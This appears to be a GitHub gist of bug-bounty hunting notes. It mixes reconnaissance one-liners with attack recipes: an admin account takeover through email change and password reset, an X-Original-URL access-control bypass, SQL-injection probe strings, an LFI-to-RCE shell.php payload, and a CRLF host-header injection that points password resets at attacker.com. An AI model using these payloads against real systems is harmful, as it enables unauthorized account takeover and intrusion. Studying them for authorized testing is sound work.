Last active
August 22, 2024 08:49
-
-
Save BugHunter001/f77f87ec10102df3f5d2fdf8bc5a8614 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
site.com/file.php | |
response = nothing | |
http://site.com/file.php~ | |
response = source | |
------------------------------------- | |
https://github.com/kleiton0x00/CRLF-one-liner | |
------------------------------------------ | |
try to add admin as your user, | |
change his email to yours, | |
request a password reset. | |
now, you are admin :) | |
this won't happen you think? It is, I did it ;) | |
you are not adding your email as admin email, you are adding admin's email to your app, changing his email with yours, then requesting pass change. admin's pass reset link is coming to you | |
----------------------------------------------- | |
subfinder -dL domains.txt -o subdomains.txt && subjack -w subdomains.txt |toslack | |
recommended to use in vm | |
(subdomain takeover automation) | |
------------------------------------------------------------------------------- | |
Easy information disclosure:- | |
cat hosts.txt | httpx -path //server-status?full=true -status-code -content-length | |
cat hosts.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length | |
-------------------------------------------------------------------------------- | |
Use the following DORK and try to do directory brute forcing if your target allows it. This will look for things you are not supposed to access that are behind a login page. | |
inurl:login | inurl:signin | intitle:Login | intitle:"sign in" | inurl:auth | |
-------------------------------------------------------------------------------- | |
Information disclosure:- | |
1. subfinder -d target. com | httprobe -c 100 > target.txt got around 210 subdomains. | |
2. cat target.txt | aquatone -out ~aquatone/target | |
3. Checked every screenshot and found an interesting subdomain. | |
4. Tried for some low hanging bugs XSS, open redirect etc but nothing worked :( | |
5. Then I decided to brute force the directories, I used ffuf and one of the wordlists from | |
@DanielMiessler | |
seclist. | |
6. ffuf -w path/to/wordlist.txt -u https :// sub .target. com/FUZZ -mc all -c -v | |
7. And after some time got an endpoint which was exposing /debug/pprof which had a lot of sensitive info such as debug info, traces etc. ;) | |
8. Reported the issue to company and they quickly fixed it and acknowledged my work :) Reference:-http://link.medium.com/mym9UTLHQ9 and great ffuf guide by | |
@codingo_ | |
https://youtu.be/iLFkxAmwXF0 | |
-------------------------------------------------------------------------------- | |
Useful services for Out of Band exploitation. | |
1. Burp Collaborator | |
2. https://webhook.site | |
3. https://requestcatcher.com | |
4. https://canarytokens.org/generate | |
5. http://dnsbin.zhack.ca | |
6. https://ngrok.com | |
------------------------------------------------------------------- | |
Google dorks for hunting | |
https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06 | |
------------------------------------------------------------------- | |
crt.sh one liner | |
curl -s https://crt.sh/\?q\=\%.target.com\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | |
------------------------------------------------------------------- | |
Jsscanner | |
https://github.com/dark-warlord14/JSScanner | |
---------------------------------------------------------------- | |
https://www.notion.so/Subdomain-Enumaration-5109690b9db14b41b02b373af8234c93 | |
subdomain enum full | |
----------------------------------------------------------------- | |
https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ (full info) | |
---------------------------------------------------------------------- | |
GET /admin HTTP/1.1 | |
Host: http://site.com | |
... | |
Access is denied | |
GET /test HTTP/1.1 | |
Host: http://site.com | |
X-Original-URL: /admin | |
HTTP/1.1 200 OK | |
--------------------------------------------------------------------------- | |
Looking for IDORs? Check this:- | |
1. Keep an eye on every endpoint what data is passing through it. | |
2. If you create an account on the main domain, try to find subdomains with login functionality. | |
3. Use Burp search functionality a lot for keywords:) | |
4. If your sequential numbers are not working, try your UserId parameter along with the victim’s id in the request. | |
5. Once you upload the images, keep an eye of it if it generates a unique ID! | |
------------------------------------------------------------------------- | |
Tip, use confirm instead of alert ;) alert is probably the most filtered word out there for xss payload | |
------------------------------------------------------------------------ | |
Always check your target name directory on domain, like http://site.com/site/ or http://target.com/target/. | |
Got same thing on 2 subdomains of a target. | |
1st was leaking staff's PII info: got 3 digit bounty. | |
--------------------------------------------------------------------------------- | |
2FA bypassing for bug bounties | |
1. Background concept about 2FA bypass | |
-With advent of account takeovers, Companies like Google, Facebook have implemented this feature on various sensitive pages where an attacker could get or modify data of a user without his intent. This Authentication method improves the security posture & provides a secure access to users. Using two-factor authentication prevents hackers or attackers from compromising your account even if your account credentials are leaked publicly or bypasses. | |
2. Impact of 2fa bypass | |
-ticket system takeover, unauthorized email verification bypass, account | |
3. Types of 2fa bypass request and response manipulation. | |
-In this we need people who are known to burpsuite and lil bit logical mindset | |
4. Security mis-configuration | |
Session hijacking, Subdomain to domain bypass, missing and broken links, input validation | |
---------------------------------------------------------------------------------------- | |
~Dorker | |
https://dorks.faisalahmed.me | |
---------------------------------------------------------------------------------------- | |
curl https://certspotter.com/api/v0/certs?domain=$1 | grep -o '\[\".*\"\]' | |
curl http://index.commoncrawl.org/CC-MAIN-2018-22-index\?url\=\*.hackerone.com\&output\=json |jq .url | |
curl http://web.archive.org/cdx/search/cdx/search/cds?url=*.cardpay.ntc.net.np/*&output=text&fl=original&collapse=urlkey | |
----------------------------------------------------------------------------------------- | |
1. Create an account email@burp_collab* | |
2. Forgot password | |
3. Received requests from internal server + SMTP connection details | |
4. Got Internal headers + origin IP | |
5. http://site.com/admin = (403) | |
6. http://site.com/admin = (Headers + Origin IP = pwn) | |
--------------------------------------------------------------------------------------------------- | |
Looking for jira subdomains of your targets ? | |
use this kinda dorks. | |
inurl:companyname intitle:JIRA login | |
inurl:visma intitle:JIRA login | |
site:*.target.com file type:jspa | |
----------------------------------------------------------------- | |
Bug Bounty Tips | |
This is how to find sql-Injection 100% of the time | |
/?q=1 | |
/?q=1' | |
/?q=1" | |
/?q=[1] | |
/?q[]=1 | |
/?q=1` | |
/?q=1\ | |
/?q=1/*'*/ | |
/?q=1/*!1111'*/ | |
/?q=1'||'asd'||' <== concat string | |
/?q=1' or '1'='1 | |
/?q=1 or 1=1 | |
/?q='or''=' | |
/?q=1-sleep() | |
/?q=1 and sleep() | |
/?q=") | |
/?q=') | |
/?q=-x() | |
---------------------------------------------------------------------------------- | |
LFI to RCE Fire | |
Uploaded shell.php | |
Page=php://filter/convert.base64-encode/resource=shell.php | |
--------------------------------------------------------------------------------- | |
wordlist for all fuzzing | |
https://wordlists.assetnote.io/ | |
https://s3.amazonaws.com/assetnote-wordlists/data/automated/$filename.txt (download) | |
--------------------------------------------------------------------------------- | |
Host Hader based CRLF Injection | |
POST /resetPassword%0D%0AHost:http://attacker.com | |
Host: http://test.com | |
[...] | |
[email protected] | |
------------------------------------------------------------------------------- | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment